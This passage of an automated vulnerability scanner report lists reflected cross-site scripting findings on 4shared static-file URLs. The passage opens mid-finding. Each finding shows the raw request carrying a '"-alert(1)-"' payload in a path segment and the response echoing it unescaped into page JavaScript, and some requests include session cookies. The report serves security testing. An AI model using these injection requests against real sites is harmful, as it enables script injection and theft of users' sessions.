Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/pageDownload1/download.csscb5cd&quot;-alert(1)-&quot;8d2149dd564
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F366F4B86F7A2AFCA5A418971330D4EE.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:24 GMT
Content-Length: 36245


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/pageDownload1/download.csscb5cd"-alert(1)-"8d2149dd564";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.234. http://static.4shared.com/css/pageDownload1/downloadWithoutCommon.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/pageDownload1/downloadWithoutCommon.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3c69"-alert(1)-"2cf4627ec1a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssf3c69"-alert(1)-"2cf4627ec1a/pageDownload1/downloadWithoutCommon.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssf3c69&quot;-alert(1)-&quot;2cf4627ec1a/pageDownload1/downloadWithoutCommon.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=EEFF1912BC6968ADA5A19D19FCFCF489.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:18 GMT
Content-Length: 36310


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssf3c69"-alert(1)-"2cf4627ec1a/pageDownload1/downloadWithoutCommon.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

1.235. http://static.4shared.com/css/pageDownload1/downloadWithoutCommon.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/pageDownload1/downloadWithoutCommon.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fec9c"-alert(1)-"5240765fe67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/pageDownload1fec9c"-alert(1)-"5240765fe67/downloadWithoutCommon.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/pageDownload1fec9c&quot;-alert(1)-&quot;5240765fe67/downloadWithoutCommon.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F9F95CE1BFBC4C7B9EC88DA773F9FA0B.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:25 GMT
Content-Length: 36299


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/pageDownload1fec9c"-alert(1)-"5240765fe67/downloadWithoutCommon.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function f
...[SNIP]...

1.236. http://static.4shared.com/css/pageDownload1/downloadWithoutCommon.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/pageDownload1/downloadWithoutCommon.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47081"-alert(1)-"19897fe20e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/pageDownload1/downloadWithoutCommon.css47081"-alert(1)-"19897fe20e2 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/pageDownload1/downloadWithoutCommon.css47081&quot;-alert(1)-&quot;19897fe20e2
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A3449E686BCEAB24A694106C9996937F.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:31 GMT
Content-Length: 36299


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/pageDownload1/downloadWithoutCommon.css47081"-alert(1)-"19897fe20e2";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.237. http://static.4shared.com/css/tutorial.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/tutorial.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa773"-alert(1)-"b1f17542dec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssaa773"-alert(1)-"b1f17542dec/tutorial.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssaa773&quot;-alert(1)-&quot;b1f17542dec/tutorial.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=72479505BB09D25E8361A917AB871891.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:05 GMT
Content-Length: 36164


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssaa773"-alert(1)-"b1f17542dec/tutorial.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.238. http://static.4shared.com/css/tutorial.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/tutorial.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd74e"-alert(1)-"6dad30ac8f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/tutorial.cssfd74e"-alert(1)-"6dad30ac8f9?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/tutorial.cssfd74e&quot;-alert(1)-&quot;6dad30ac8f9
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=93B8E7619EDD47EBB4FBE25560CB6C1A.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:09 GMT
Content-Length: 36175


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/tutorial.cssfd74e"-alert(1)-"6dad30ac8f9";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.239. http://static.4shared.com/desktop/desktop.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /desktop/desktop.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f396c"-alert(1)-"7819c5badf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /desktopf396c"-alert(1)-"7819c5badf/desktop.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /desktopf396c&quot;-alert(1)-&quot;7819c5badf/desktop.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9C1A7BD0B0E6AF8E747AC2544F9A16C8.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:40 GMT
Content-Length: 36174


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/desktopf396c"-alert(1)-"7819c5badf/desktop.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.240. http://static.4shared.com/desktop/desktop.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /desktop/desktop.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 630cd"-alert(1)-"d08d1566e98 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /desktop/desktop.css630cd"-alert(1)-"d08d1566e98 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /desktop/desktop.css630cd&quot;-alert(1)-&quot;d08d1566e98
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AA5872801E98E173BB61348634CE6CF6.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:45 GMT
Content-Length: 36190


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/desktop/desktop.css630cd"-alert(1)-"d08d1566e98";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.241. http://static.4shared.com/dwr/engine.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /dwr/engine.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7289a"-alert(1)-"da5431a7505 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dwr7289a"-alert(1)-"da5431a7505/engine.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /dwr7289a&quot;-alert(1)-&quot;da5431a7505/engine.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=00B3741014BF2AD0E8FF51C5BA549003.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:45 GMT
Content-Length: 36160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/dwr7289a"-alert(1)-"da5431a7505/engine.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.242. http://static.4shared.com/dwr/engine.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /dwr/engine.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2dbcd"-alert(1)-"68c48b7d60f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dwr/2dbcd"-alert(1)-"68c48b7d60f?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DAAB3CF86EC0E243EFBD3B3398498731.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:49 GMT
Content-Length: 36115


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/dwr/2dbcd"-alert(1)-"68c48b7d60f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.243. http://static.4shared.com/dwr/interface/DirChecks.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /dwr/interface/DirChecks.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecb97"-alert(1)-"81101aeb9ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dwrecb97"-alert(1)-"81101aeb9ce/interface/DirChecks.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /dwrecb97&quot;-alert(1)-&quot;81101aeb9ce/interface/DirChecks.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7D64AD06194FD8CC93BD6BE654E5F064.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:42 GMT
Content-Length: 36225


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/dwrecb97"-alert(1)-"81101aeb9ce/interface/DirChecks.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feed
...[SNIP]...

1.244. http://static.4shared.com/dwr/interface/DirChecks.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /dwr/interface/DirChecks.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8499f"-alert(1)-"105b75277af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dwr/interface8499f"-alert(1)-"105b75277af/DirChecks.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0465F93AE68A9307DB1F71E541F1FD88.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:46 GMT
Content-Length: 36214


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/dwr/interface8499f"-alert(1)-"105b75277af/DirChecks.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.245. http://static.4shared.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bf63"-alert(1)-"b00ceae7821 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico4bf63"-alert(1)-"b00ceae7821 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __qca=P0-1133200866-1297862349616; search.view2=ls; JSESSIONID=1C17362F5BC92C5103B471FB8A66CDEC.dc293; __utmz=210074320.1298730611.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=210074320.1172937508.1297862350.1298497029.1298730611.3; __utmc=210074320; __utmb=210074320.1.10.1298730611; WWW_JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /favicon.ico4bf63&quot;-alert(1)-&quot;b00ceae7821
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5A859F2580962A175B0E84ECA0DA5E46.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:30:33 GMT
Content-Length: 36150


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/favicon.ico4bf63"-alert(1)-"b00ceae7821";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.246. http://static.4shared.com/images/all1.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/all1.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14de5"-alert(1)-"e4251d0b96d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images14de5"-alert(1)-"e4251d0b96d/all1.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images14de5&quot;-alert(1)-&quot;e4251d0b96d/all1.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B90B8CFFF92E414656949961A77BB453.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:17 GMT
Content-Length: 36189


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images14de5"-alert(1)-"e4251d0b96d/all1.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.247. http://static.4shared.com/images/all1.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/all1.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d50a"-alert(1)-"fe06872aee9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/all1.png6d50a"-alert(1)-"fe06872aee9 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/all1.png6d50a&quot;-alert(1)-&quot;fe06872aee9
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F60A78D00D8D111A732C99A0F05AEB4D.dc292; Path=/
Content-Type: text/html;charset=UTF-8
